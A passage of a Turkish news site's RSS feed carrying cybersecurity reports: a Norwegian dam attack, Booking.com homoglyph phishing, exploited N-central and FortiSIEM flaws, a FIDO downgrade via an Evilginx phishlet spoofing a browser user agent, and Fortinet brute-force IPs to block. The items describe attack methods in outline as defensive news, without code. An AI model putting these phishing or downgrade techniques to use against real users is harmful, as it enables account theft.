<p data-start="1346" data-end="1621">Haziran ayında Norveç Ulusal Kriminal Soruşturma Servisi (Kripos) de benzer bir sonuca ulaştı. Rus hacker grupları saldırıyı doğrulamak için Telegram üzerinden üç dakikalık bir video yayımladı. Videoda barajın kontrol paneli ve pro-Rus bir siber grubun işaretleri yer aldı.</p>
<p data-start="1623" data-end="1851"><strong data-start="1623" data-end="1668">Rusya ile İlişkilendirilen İkinci Saldırı</strong><br data-start="1668" data-end="1671">Bu olay, Norveç’te Rusya bağlantılı ikinci büyük siber saldırı olarak kayıtlara geçti. Daha önce ülkenin devlet hizmetlerine yönelik geniş çaplı bir DDoS saldırısı düzenlenmişti.</p>
<p data-start="1853" data-end="2071">Norveç İstihbarat Şefi Nils Andreas Stensønes, Rusya’nın Batı’ya karşı hibrit saldırılarla gerilimi artırdığını belirterek, “Norveç savaşta değil, ancak Rusya öngörülemez bir komşu ve en büyük tehdit konumunda” dedi.</p>
<p data-start="2073" data-end="2249"><strong data-start="2073" data-end="2085"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Booking.com kullanıcılarını hedef alan yeni oltalama saldırısı: Japonca karakter ‘ん’ URL’lerde gizlenerek sahte siteyi gerçekmiş gibi gösteriyor</title>
<link>https://www.ajansexpres.com.tr/bookingcom-kullanicilarini-hedef-alan-yeni-oltalama-saldirisi-japonca-karakter-%E3%82%93-urllerde-gizlenerek-sahte-siteyi-gercekmis-gibi-goesteriyor</link>
<guid>https://www.ajansexpres.com.tr/bookingcom-kullanicilarini-hedef-alan-yeni-oltalama-saldirisi-japonca-karakter-%E3%82%93-urllerde-gizlenerek-sahte-siteyi-gercekmis-gibi-goesteriyor</guid>
<description><![CDATA[ Siber saldırganlar, Unicode tabanlı sahte karakterler kullanarak Booking.com müşterilerini hedef alan oltalama kampanyası başlattı. ‘ん’ karakteri URL’lerde eğik çizgiye benzetilerek kullanıcıları yanıltıyor, sahte site üzerinden zararlı yazılımlar indirtiliyor. Aynı yöntemle Intuit kullanıcılarının da hedef alındığı bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd70e6adc.webp" length="21952" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:16 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Booking.com kullanıcıları nasıl oltalama saldırısına maruz kalıyor, Unicode karakteri ‘ん’ URL’lerde nasıl kullanılıyor, Intuit kullanıcıları hangi yöntemle hedef alınıyor, saldırganların nihai amacı nedir</media:keywords>
<content:encoded><![CDATA[<p><br data-start="530" data-end="533">Booking.com müşterilerini hedef alan yeni bir oltalama kampanyası ortaya çıktı. Güvenlik araştırmacısı JAMESWT tarafından fark edilen saldırıda, saldırganlar Japonca hiragana alfabesinden “ん” karakterini kullanarak sahte bağlantıları gerçeğe yakın gösterebiliyor.</p>
<p></p>
<p data-start="800" data-end="1110">İlk bakışta Booking.com’un resmi adreslerine benziyormuş gibi görünen bu bağlantılar, kullanıcıları sahte alan adlarına yönlendiriyor. Örneğin, “<a data-start="945" data-end="1023" rel="noopener" target="_new" class="cursor-pointer"> şeklinde görünen link, aslında www-account-booking[.]com adlı sahte bir domaine ait.</p>
<p data-start="1112" data-end="1407"><strong data-start="1112" data-end="1140">Zararlı Yazılım Dağıtımı</strong><br data-start="1140" data-end="1143">Kullanıcılar bu bağlantıya tıkladığında zararlı bir MSI dosyası indirilerek bilgisayara yükleniyor. Güvenlik araştırmaları, indirilen dosyanın bilgi hırsızları veya uzaktan erişim trojanları gibi ek kötü amaçlı yazılımlar kurmak için kullanıldığını ortaya koydu.</p>
<p data-start="1409" data-end="1644">Bu yöntem, “homoglif” olarak adlandırılan, birbirine çok benzeyen ancak farklı alfabelere ait karakterleri kullanarak yapılan oltalama saldırılarının bir örneği. Benzer teknikler daha önce de Cyrillic ve Latin harfleriyle görülmüştü.</p>
<p data-start="1646" data-end="2007"><strong data-start="1646" data-end="1681">Intuit Kullanıcıları da Hedefte</strong><br data-start="1681" data-end="1684">BleepingComputer tarafından bildirilen ayrı bir saldırıda ise Intuit kullanıcıları hedef alındı. Bu kampanyada “intuit.com” gibi görünen sahte alan adları aslında “Lntuit.com” şeklinde kayıtlı. Küçük harf kullanıldığında “L” harfinin “i” harfine çok benzemesi, kullanıcıların sahte bağlantıyı fark etmesini zorlaştırıyor.</p>
<p data-start="2009" data-end="2288">E-postalarda yer alan “Hesabımı doğrula” bağlantısına tıklayan kullanıcılar sahte sitelere yönlendirilirken, bağlantı doğrudan açıldığında ise gerçek Intuit giriş sayfasına geri yönlendiriliyor. Bu yöntemle saldırganların özellikle mobil kullanıcıları hedef aldığı düşünülüyor.</p>
<p data-start="2290" data-end="2645"><strong data-start="2290" data-end="2331">Daha Önce de Booking.com Hedef Alındı</strong><br data-start="2331" data-end="2334">Booking.com markası daha önce de oltalama saldırılarında kullanıldı. 2023’te otel müşterilerinin sahte sitelere yönlendirilerek kredi kartı bilgilerinin çalındığı, 2025’in Mart ayında ise Microsoft’un, konaklama sektörü çalışanlarını hedef alan başka bir oltalama kampanyası konusunda uyarı yaptığı biliniyor.</p>
<p data-start="2647" data-end="2802">Uzmanlar, kullanıcıların bağlantılara tıklamadan önce alan adlarını dikkatle incelemesi ve güncel güvenlik yazılımları kullanması gerektiğini belirtiyor.</p>
<p data-start="2804" data-end="3027"><strong data-start="2804" data-end="2816"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Kanada Avam Kamarası’nda siber saldırı sonrası veri ihlali soruşturması başlatıldı</title>
<link>https://www.ajansexpres.com.tr/kanada-avam-kamarasinda-siber-saldiri-sonrasi-veri-ihlali-sorusturmasi-baslatildi</link>
<guid>https://www.ajansexpres.com.tr/kanada-avam-kamarasinda-siber-saldiri-sonrasi-veri-ihlali-sorusturmasi-baslatildi</guid>
<description><![CDATA[ Kanada Avam Kamarası çalışanlarının bilgilerinin çalındığı bir siber saldırı sonrası yetkililer soruşturma başlattı. Microsoft güvenlik açığının kullanıldığı olayda saldırganların, parlamento personeline ait isim, görev, ofis ve e-posta verilerini ele geçirdiği bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd6ab602c.webp" length="42364" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:10 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Kanada Avam Kamarası’nda siber saldırı nasıl gerçekleşti, hangi çalışan verileri çalındı, saldırıda hangi Microsoft açıklarının kullanılmış olabileceği değerlendiriliyor, yetkililer ne tür önlemler öneriyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="412" data-end="415">Kanada Avam Kamarası, geçtiğimiz Cuma günü yaşanan siber saldırının ardından veri ihlali soruşturması yürütüyor. CBC News’in aktardığına göre, çalışanlar Pazartesi günü gönderilen bir e-posta ile olay hakkında bilgilendirildi.</p>
<p></p>
<p data-start="645" data-end="998">Söz konusu saldırıda, Microsoft yazılımlarında bulunan güvenlik açığının istismar edilerek Avam Kamarası bilgisayar ve mobil cihazlarını yöneten bir veritabanına sızıldığı belirtildi. Saldırı sırasında çalışanlara ait kamuya açık olmayan veriler de çalındı. Bu veriler arasında isimler, görev unvanları, ofis konumları ve e-posta adresleri yer alıyor.</p>
<p data-start="1000" data-end="1171"><strong data-start="1000" data-end="1026">Dolandırıcılık Uyarısı</strong><br data-start="1026" data-end="1029">Avam Kamarası üyeleri ve çalışanları, çalınan verilerin kimlik sahteciliği ya da dolandırıcılık amaçlı kullanılabileceği konusunda uyarıldı.</p>
<p data-start="1173" data-end="1516">Kanada İletişim Güvenliği Kurumu’na (CSE) bağlı Kanada Siber Güvenlik Merkezi (Cyber Centre), soruşturmaya destek verdiğini açıkladı. Kurum tarafından yapılan açıklamada, saldırının belirli bir tehdit grubu veya devlet destekli aktörlerle ilişkilendirilmediği, siber olaylarda failleri tespit etmenin zaman ve kaynak gerektirdiği vurgulandı.</p>
<p data-start="1518" data-end="1886"><strong data-start="1518" data-end="1550">Microsoft Açıkları Ön Planda</strong><br data-start="1550" data-end="1553">Her ne kadar saldırıda kullanılan açık hakkında resmi açıklama yapılmasa da, Kanada Siber Merkezi kısa süre önce iki Microsoft güvenlik açığı konusunda ülke genelinde uyarıda bulunmuştu. Bunlardan biri SharePoint Server’daki CVE-2025-53770 (ToolShell) olarak bilinen açık, diğeri ise Exchange sunucularını etkileyen CVE-2025-53786.</p>
<p data-start="1888" data-end="2219">ToolShell açığı Temmuz ayından bu yana Çin destekli gruplar ve fidye yazılım çeteleri tarafından aktif olarak kullanılıyor. Bu açık aracılığıyla ABD Ulusal Nükleer Güvenlik İdaresi, Eğitim Bakanlığı, Florida Gelir İdaresi, Rhode Island Genel Meclisi ve Avrupa ile Orta Doğu’daki bazı devlet kurumlarının hedef alındığı biliniyor.</p>
<p data-start="2221" data-end="2444">CVE-2025-53786 ise Microsoft Exchange ortamlarında saldırganlara ağ içinde yatay hareket etme imkânı tanıyor. ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) geçtiğimiz hafta bu açık için acil direktif yayımlamıştı.</p>
<p data-start="2446" data-end="2623">Güvenlik uzmanları, Kanada’daki kurumların vakit kaybetmeden sistemlerini güncellemeleri gerektiğini, aksi halde benzer saldırılarla karşı karşıya kalınabileceğini belirtiyor.</p>
<p data-start="2625" data-end="2850"><strong data-start="2625" data-end="2637"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>CISA, N&#45;able N&#45;central güvenlik açıklarının aktif olarak istismar edildiğini duyurdu, yöneticilere acil yama çağrısı yaptı</title>
<link>https://www.ajansexpres.com.tr/cisa-n-able-n-central-guvenlik-aciklarinin-aktif-olarak-istismar-edildigini-duyurdu-yoeneticilere-acil-yama-cagrisi-yapti</link>
<guid>https://www.ajansexpres.com.tr/cisa-n-able-n-central-guvenlik-aciklarinin-aktif-olarak-istismar-edildigini-duyurdu-yoeneticilere-acil-yama-cagrisi-yapti</guid>
<description><![CDATA[ ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), N-able’ın N-central platformunda tespit edilen iki kritik açığın sıfır gün saldırılarında kullanıldığını açıkladı. Şirket yamaları yayımlarken, on-premises kullanıcıların 2025.3.1 sürümüne yükseltmesi istendi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd64cd6e2.webp" length="46292" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:04 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>N-able N-central güvenlik açıkları hangi riskleri taşıyor, istismar edilen zafiyetler nasıl çalışıyor, CISA hangi kurumlara hangi süreyi tanıdı, N-able kullanıcılarının hangi sürüme geçmesi gerekiyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="443" data-end="446">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), N-able’ın uzaktan izleme ve yönetim platformu N-central’da iki güvenlik açığının aktif olarak kullanıldığını duyurdu. N-central, yönetilen hizmet sağlayıcılar (MSP) ve IT departmanları tarafından ağ ve cihazları merkezi bir konsoldan yönetmek için yaygın olarak kullanılıyor.</p>
<p></p>
<p data-start="780" data-end="997">CISA’nın açıklamasına göre, CVE-2025-8875 olarak izlenen açık güvenliksiz serileştirme üzerinden komut çalıştırmaya, CVE-2025-8876 ise kullanıcı girdisinin hatalı filtrelenmesiyle komut enjeksiyonuna olanak tanıyor.</p>
<p data-start="999" data-end="1309"><strong data-start="999" data-end="1030">N-able’dan Açıklama ve Yama</strong><br data-start="1030" data-end="1033">N-able, açıkların istismar edildiğini doğrulayarak güvenlik güncellemelerinin N-central 2025.3.1 sürümüyle yayımlandığını bildirdi. Şirket, saldırıların sınırlı sayıda on-premises ortamda gözlemlendiğini, ancak bulut tabanlı sistemlerde bir bulguya rastlanmadığını açıkladı.</p>
<p data-start="1311" data-end="1549">Şirketin duyurusunda, “On-premises N-central kullananların vakit kaybetmeden 2025.3.1 sürümüne yükseltmesi gerekmektedir. Güvenlik politikamız gereği CVE ayrıntıları güncellemeden üç hafta sonra paylaşılacaktır” ifadelerine yer verildi.</p>
<p data-start="1551" data-end="1943"><strong data-start="1551" data-end="1593">Federal Kurumlara Son Tarih 20 Ağustos</strong><br data-start="1593" data-end="1596">CISA, söz konusu açıkları “Bilinen İstismar Edilen Açıklar Kataloğu”na ekleyerek Federal Civilian Executive Branch kurumlarının 20 Ağustos’a kadar sistemlerini yamalamasını zorunlu kıldı. 2021’de yürürlüğe giren Bağlayıcı Operasyonel Direktif (BOD) 22-01 çerçevesinde belirlenen süreye uymayan kurumlar ciddi risklerle karşı karşıya kalabilecek.</p>
<p data-start="1945" data-end="2113">Shodan verilerine göre, çevrimiçi olarak erişilebilir yaklaşık 2.000 N-able N-central örneği bulunuyor. Bunların büyük kısmı ABD, Avustralya ve Almanya’da yer alıyor.</p>
<p data-start="2115" data-end="2374">CISA ayrıca özel sektör dahil tüm kuruluşlara da güncellemeleri önceliklendirmeleri yönünde çağrı yaptı. Açıklamada, “Bu tür açıklar kötü niyetli aktörler için sık kullanılan saldırı vektörleri olup federal ağlar için ciddi riskler oluşturmaktadır” denildi.</p>
<p data-start="2376" data-end="2594"><strong data-start="2376" data-end="2388"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Fortinet, FortiSIEM’de kritik uzaktan kod çalıştırma açığı için uyardı: İstismar kodu dolaşımda</title>
<link>https://www.ajansexpres.com.tr/fortinet-fortisiemde-kritik-uzaktan-kod-calistirma-acigi-icin-uyardi-istismar-kodu-dolasimda</link>
<guid>https://www.ajansexpres.com.tr/fortinet-fortisiemde-kritik-uzaktan-kod-calistirma-acigi-icin-uyardi-istismar-kodu-dolasimda</guid>
<description><![CDATA[ Fortinet, güvenlik operasyon merkezlerinde yaygın olarak kullanılan FortiSIEM ürününde kimlik doğrulama gerektirmeden istismar edilebilen kritik bir güvenlik açığı (CVE-2025-25256) tespit edildiğini duyurdu. Şirket, aktif saldırıların başladığını ve yöneticilerin acilen güncellemeleri uygulaması gerektiğini bildirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd602c2d2.webp" length="34946" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:00 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>FortiSIEM güvenlik açığı nasıl çalışıyor, hangi sürümler risk altında, yöneticilerin uygulaması gereken güvenlik güncellemeleri neler, geçici olarak hangi önlemler alınabiliyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="470" data-end="473">Fortinet, FortiSIEM güvenlik izleme ve analiz sisteminde kritik seviyede bir güvenlik açığının (CVE-2025-25256) istismar edildiğini açıkladı. CVSS puanı 9.8 olan açık, saldırganların özel hazırlanmış CLI istekleri aracılığıyla uzaktan ve kimlik doğrulaması olmadan komut çalıştırmasına olanak tanıyor.</p>
<p></p>
<p data-start="778" data-end="1018">FortiSIEM; kamu kurumları, büyük ölçekli işletmeler, finans kuruluşları, sağlık sektörü ve yönetilen güvenlik hizmet sağlayıcıları (MSSP) tarafından yaygın olarak kullanılıyor. Açığın etki alanı 5.4 sürümünden 7.3 sürümüne kadar uzanıyor.</p>
<p data-start="1020" data-end="1344"><strong data-start="1020" data-end="1049">Fortinet’ten Kritik Uyarı</strong><br data-start="1049" data-end="1052">Fortinet, açığın aktif olarak kullanıldığını doğruladı. Açıklamada, “Bu güvenlik açığı için pratik istismar kodunun dolaşımda olduğu tespit edilmiştir” ifadesine yer verildi. Ayrıca istismarın cihazda ayırt edici bir gösterge (IOC) bırakmadığı, dolayısıyla tespitinin zor olduğu belirtildi.</p>
<p data-start="1346" data-end="1437">Şirket, güvenlik güncellemesi yayımlanan sürümlere acilen geçilmesi gerektiğini bildirdi:</p>
<ul data-start="1439" data-end="1539">
<li data-start="1439" data-end="1458">
<p data-start="1441" data-end="1458">FortiSIEM 7.3.2</p>
</li>
<li data-start="1459" data-end="1478">
<p data-start="1461" data-end="1478">FortiSIEM 7.2.6</p>
</li>
<li data-start="1479" data-end="1498">
<p data-start="1481" data-end="1498">FortiSIEM 7.1.8</p>
</li>
<li data-start="1499" data-end="1518">
<p data-start="1501" data-end="1518">FortiSIEM 7.0.4</p>
</li>
<li data-start="1519" data-end="1539">
<p data-start="1521" data-end="1539">FortiSIEM 6.7.10</p>
</li>
</ul>
<p data-start="1541" data-end="1689">5.4 ile 6.6 arasındaki eski sürümler için yama yayımlanmayacağı, bu sürümlerin kullanıcılarının desteklenen sürümlere geçmesi gerektiği açıklandı.</p>
<p data-start="1691" data-end="1939"><strong data-start="1691" data-end="1719">Geçici Çözüm ve Önlemler</strong><br data-start="1719" data-end="1722">Fortinet, phMonitor bileşeninin 7900 numaralı portuna erişimi kısıtlamanın geçici bir önlem olabileceğini bildirdi. Ancak bunun yalnızca saldırı yüzeyini daralttığı, açığın kendisini ortadan kaldırmadığı vurgulandı.</p>
<p data-start="1941" data-end="2274">Açıklama, GreyNoise’un bu ayın başında Fortinet SSL VPN’lerine yönelik kaba kuvvet saldırılarında büyük artış gözlemlendiğini ve daha sonra FortiManager’a yönelim olduğunu rapor etmesinin hemen ardından geldi. Güvenlik uzmanları bu tür trafik artışlarının çoğu zaman yeni bir güvenlik açığının habercisi olabileceğini ifade ediyor.</p>
<p data-start="2276" data-end="2471"><strong data-start="2276" data-end="2288"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft Entra ID’de FIDO kimlik doğrulamasını devre dışı bırakabilen yeni saldırı yöntemi keşfedildi</title>
<link>https://www.ajansexpres.com.tr/microsoft-entra-idde-fido-kimlik-dogrulamasini-devre-disi-birakabilen-yeni-saldiri-yoentemi-kesfedildi</link>
<guid>https://www.ajansexpres.com.tr/microsoft-entra-idde-fido-kimlik-dogrulamasini-devre-disi-birakabilen-yeni-saldiri-yoentemi-kesfedildi</guid>
<description><![CDATA[ Proofpoint araştırmacıları, Microsoft Entra ID kullanıcılarını FIDO kimlik doğrulamasından daha zayıf yöntemlere yönlendiren yeni bir “downgrade” saldırısı geliştirdi. Bu yöntemle saldırganlar, AiTM (adversary-in-the-middle) tekniği üzerinden oturum çerezlerini ele geçirerek hesapları ele geçirebiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd5c1aa9a.webp" length="41962" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:56 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>FIDO downgrade saldırısı nasıl çalışıyor, Microsoft Entra ID kullanıcıları hangi risklerle karşı karşıya, saldırıyı önlemek için hangi önlemler alınmalı, Microsoft bu araştırmaya nasıl yanıt verdi</media:keywords>
<content:encoded><![CDATA[<p><br data-start="463" data-end="466">Siber güvenlik araştırmacıları, Microsoft Entra ID’de kullanılan FIDO tabanlı şifresiz kimlik doğrulamanın dolaylı olarak devre dışı bırakılabileceğini gösteren yeni bir saldırı tekniği ortaya koydu. Proofpoint tarafından geliştirilen yöntem, kullanıcıların FIDO desteği olmayan bir tarayıcı kullandıkları izlenimini vererek, onları daha zayıf doğrulama yöntemlerine yönlendiriyor.</p>
<p></p>
<p data-start="851" data-end="1264"><strong data-start="851" data-end="874">Saldırının İşleyişi</strong><br data-start="874" data-end="877">Araştırmacılar, Evilginx adlı AiTM (adversary-in-the-middle) çerçevesine özel bir “phishlet” ekleyerek Safari’nin Windows sürümünü taklit eden bir kullanıcı aracısı oluşturdu. Bu tarayıcı FIDO tabanlı kimlik doğrulamasını desteklemediği için Microsoft Entra ID, kullanıcıya hata mesajı gösteriyor ve alternatif yöntemler (Microsoft Authenticator uygulaması, SMS kodu, OTP vb.) sunuyor.</p>
<p data-start="1266" data-end="1540">Kullanıcı bu yöntemlerden biriyle giriş yaptığında, saldırı platformu hem kullanıcı adı/parolayı hem de çok faktörlü doğrulama (MFA) tokenini veya oturum çerezini ele geçiriyor. Bu çerez saldırganın tarayıcısına aktarıldığında, kurbanın hesabına tam erişim sağlanabiliyor.</p>
<p data-start="1542" data-end="1748"><strong data-start="1542" data-end="1574">Henüz Saldırılarda Görülmedi</strong><br data-start="1574" data-end="1577">Proofpoint, yöntemin şu ana kadar gerçek saldırılarda kullanılmadığını ancak özellikle yüksek değerli hedeflere yönelik operasyonlarda ciddi risk oluşturduğunu belirtti.</p>
<p data-start="1750" data-end="2082">Microsoft, araştırma hakkında yaptığı açıklamada bunun bir ürün açığı olmadığını, sosyal mühendislik yoluyla gerçekleştirilen bir oltalama tekniği olduğunu vurguladı. Şirket, kullanıcıların kimlik doğrulama gücü politikalarıyla daha güçlü yöntemleri zorunlu hale getirmesini ve şüpheli bağlantılara tıklamaktan kaçınmasını önerdi.</p>
<p data-start="2084" data-end="2367"><strong data-start="2084" data-end="2096">Önlemler</strong><br data-start="2096" data-end="2099">Uzmanlar, kullanıcıların beklenmedik şekilde alternatif kimlik doğrulama seçenekleriyle karşılaşmaları halinde işlemi durdurmaları gerektiğini söylüyor. Ayrıca, fallback doğrulama yöntemlerinin kapatılması veya ek güvenlik kontrollerinin devreye alınması öneriliyor.</p>
<p data-start="2369" data-end="2624">Geçtiğimiz ay farklı bir FIDO zayıflatma saldırısı da rapor edilmişti. Expel araştırmacıları tarafından geliştirilen “PoisonSeed” adlı yöntemde kullanıcılar sahte bir QR kod aracılığıyla kandırılmaya çalışılmış, ancak pratikte saldırı başarısız olmuştu.</p>
<p data-start="2626" data-end="2841"><strong data-start="2626" data-end="2638"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Fortinet VPN’lerine yönelik kaba kuvvet saldırılarında artış: Yeni sıfır gün açıklarının habercisi olabilir</title>
<link>https://www.ajansexpres.com.tr/fortinet-vpnlerine-yoenelik-kaba-kuvvet-saldirilarinda-artis-yeni-sifir-gun-aciklarinin-habercisi-olabilir</link>
<guid>https://www.ajansexpres.com.tr/fortinet-vpnlerine-yoenelik-kaba-kuvvet-saldirilarinda-artis-yeni-sifir-gun-aciklarinin-habercisi-olabilir</guid>
<description><![CDATA[ Tehdit istihbarat platformu GreyNoise, 3 ve 5 Ağustos tarihlerinde Fortinet SSL VPN’lerine ve FortiManager’a yönelik yoğun kaba kuvvet saldırıları tespit etti. Uzmanlar, bu tür saldırı dalgalarının genellikle yeni güvenlik açıklarının duyurulmasından önce ortaya çıktığını belirterek kurumları uyardı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd584b872.webp" length="36754" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:52 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Fortinet VPN’lerine yönelik kaba kuvvet saldırılarında nasıl bir artış görüldü, saldırılar hangi tarihlerde yoğunlaştı, hangi IP adresleri engellenmeli, bu saldırılar sıfır gün açıklarıyla nasıl ilişkilendiriliyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="465" data-end="468">Fortinet ürünlerine yönelik saldırılarda dikkat çekici bir artış gözlemlendi. GreyNoise’un raporuna göre, 3 Ağustos 2025’te Fortinet SSL VPN sistemlerine yönelik kaba kuvvet saldırılarında ani bir yükseliş yaşandı. İki gün sonra, 5 Ağustos’ta saldırılar bu kez FortiManager’ın FGFM servisine yöneldi.</p>
<p></p>
<p data-start="772" data-end="1149">Söz konusu değişim, saldırganların ya aynı altyapıyı kullanarak farklı Fortinet ürünlerini hedef aldığını ya da kullandıkları araçların yeni hedeflere adapte edildiğini gösteriyor. GreyNoise, bu tür saldırıların genellikle yeni güvenlik açıklarının açıklanmasından yaklaşık altı hafta önce tespit edildiğini ve istismar girişimlerinin kısa sürede başlayabileceğini vurguladı.</p>
<p data-start="1151" data-end="1452"><strong data-start="1151" data-end="1180">Tespit Edilen Faaliyetler</strong><br data-start="1180" data-end="1183">GreyNoise’un analizine göre, 3 Ağustos’taki saldırı trafiği daha önce Haziran ayında Pilot Fiber Inc. ile ilişkili bir FortiGate cihazından kaydedilen etkinliklerle benzerlik gösterdi. Bu durum, aynı araçların veya altyapının tekrar kullanım ihtimaline işaret ediyor.</p>
<p data-start="1454" data-end="1715">5 Ağustos’tan itibaren ise trafik SSL VPN yerine FortiManager’a yöneldi. GreyNoise, bunun sadece araştırmacıların yaptığı geniş kapsamlı taramalardan farklı olduğunu, doğrudan yetkisiz erişim denemelerine işaret eden kaba kuvvet saldırıları olduğunu belirtti.</p>
<p data-start="1717" data-end="1882"><strong data-start="1717" data-end="1754">Engellenmesi Gereken IP Adresleri</strong><br data-start="1754" data-end="1757">Rapor kapsamında aşağıdaki IP adresleri saldırılarla ilişkilendirildi ve güvenlik duvarlarında engellenmesi tavsiye edildi:</p>
<ul data-start="1884" data-end="2071">
<li data-start="1884" data-end="1901">
<p data-start="1886" data-end="1901">31.206.51.194</p>
</li>
<li data-start="1902" data-end="1920">
<p data-start="1904" data-end="1920">23.120.100.230</p>
</li>
<li data-start="1921" data-end="1937">
<p data-start="1923" data-end="1937">96.67.212.83</p>
</li>
<li data-start="1938" data-end="1957">
<p data-start="1940" data-end="1957">104.129.137.162</p>
</li>
<li data-start="1958" data-end="1975">
<p data-start="1960" data-end="1975">118.97.151.34</p>
</li>
<li data-start="1976" data-end="1994">
<p data-start="1978" data-end="1994">180.254.147.16</p>
</li>
<li data-start="1995" data-end="2013">
<p data-start="1997" data-end="2013">20.207.197.237</p>
</li>
<li data-start="2014" data-end="2033">
<p data-start="2016" data-end="2033">180.254.155.227</p>
</li>
<li data-start="2034" data-end="2052">
<p data-start="2036" data-end="2052">185.77.225.174</p>
</li>
<li data-start="2053" data-end="2071">
<p data-start="2055" data-end="2071">45.227.254.113</p>
</li>
</ul>
<p data-start="2073" data-end="2288"><strong data-start="2073" data-end="2097">Uzmanlardan Uyarılar</strong><br data-start="2097" data-end="2100">GreyNoise, yöneticilere Fortinet cihazlarında oturum açma korumalarını güçlendirmeleri, dış erişimleri yalnızca güvenilir IP aralıkları ve VPN üzerinden sınırlamaları çağrısında bulundu.</p>
<p data-start="2290" data-end="2479">Siber güvenlik uzmanları, kaba kuvvet saldırılarındaki bu artışın, Fortinet ürünlerinde henüz açıklanmamış sıfır gün açıklarının duyurulmadan önce test edilmesi ihtimaline dikkat çekiyor.</p>
<p data-start="2481" data-end="2713"><strong data-start="2481" data-end="2493"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Pennsylvania Başsavcılık ofisi siber saldırı sonrası e&#45;posta, sabit hat ve web sitesinin devre dışı kaldığını açıkladı</title>
<link>https://www.ajansexpres.com.tr/pennsylvania-bassavcilik-ofisi-siber-saldiri-sonrasi-e-posta-sabit-hat-ve-web-sitesinin-devre-disi-kaldigini-acikladi</link>
<guid>https://www.ajansexpres.com.tr/pennsylvania-bassavcilik-ofisi-siber-saldiri-sonrasi-e-posta-sabit-hat-ve-web-sitesinin-devre-disi-kaldigini-acikladi</guid>
<description><![CDATA[ Pennsylvania Başsavcılık Ofisi, hafta sonu gerçekleşen siber saldırının ardından kurum ağının devre dışı kaldığını, kurumsal web sitesi, e-posta hesapları ve sabit hatların çalışmadığını bildirdi. Başsavcı Dave Sunday, kolluk birimleriyle birlikte olayı soruşturduklarını ve hizmetleri geri yüklemek için çalıştıklarını açıkladı. Resmî atıf yapılmasa da saldırının kapsamı fidye yazılımı şüphesi doğurdu. Bir ay önce kurum altyapısında kamuya açık Citrix NetScaler cihazlarında kritik CVE-2025-5777 açığına karşı zafiyetler tespit edilmişti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd5400e69.webp" length="39988" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:47 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Başsavcılık ofisinde hangi hizmetler kesintiye uğradı, saldırının fidye yazılımı olma ihtimali neden gündemde, olası giriş vektörü olarak hangi zafiyet değerlendiriliyor, kurumlar bu tür saldırılara karşı hangi acil adımları atmalı</media:keywords>
<content:encoded><![CDATA[<p><br data-start="716" data-end="719">Pennsylvania Başsavcılık Ofisi, Cuma günü gerçekleşen siber olayın ardından ağ servislerinin devre dışı kaldığını duyurdu. Başsavcı Dave Sunday, sosyal medya üzerinden yaptığı açıklamada, “Başsavcılık Ofisi sistemlerini barındıran ağ şu anda kapalı durumda; kurum web sitesi, ofis e-posta hesapları ve sabit hatlar çevrimdışı.” dedi. Sunday, olayın nedeninin araştırıldığını ve tüm kanallarda hizmetlerin geri yüklenmesi için çalışmaların sürdüğünü belirtti.</p>
<p></p>
<p data-start="1181" data-end="1539"><strong data-start="1181" data-end="1205">Ne oldu, ne etkiledi</strong><br data-start="1205" data-end="1208">Kurum, kamuya açık bir atıf yapmadı; herhangi bir tehdit grubu işaret edilmedi. Ancak etki alanının genişliği ve hizmet kesintilerinin süresi, fidye yazılımı ihtimalini güçlendirdi. Olay sırasında ofis personelinin çalışmalarını sürdürdüğü ve kesintilerin en aza indirilmesi için yöneticilerle koordinasyon sağlandığı bildirildi.</p>
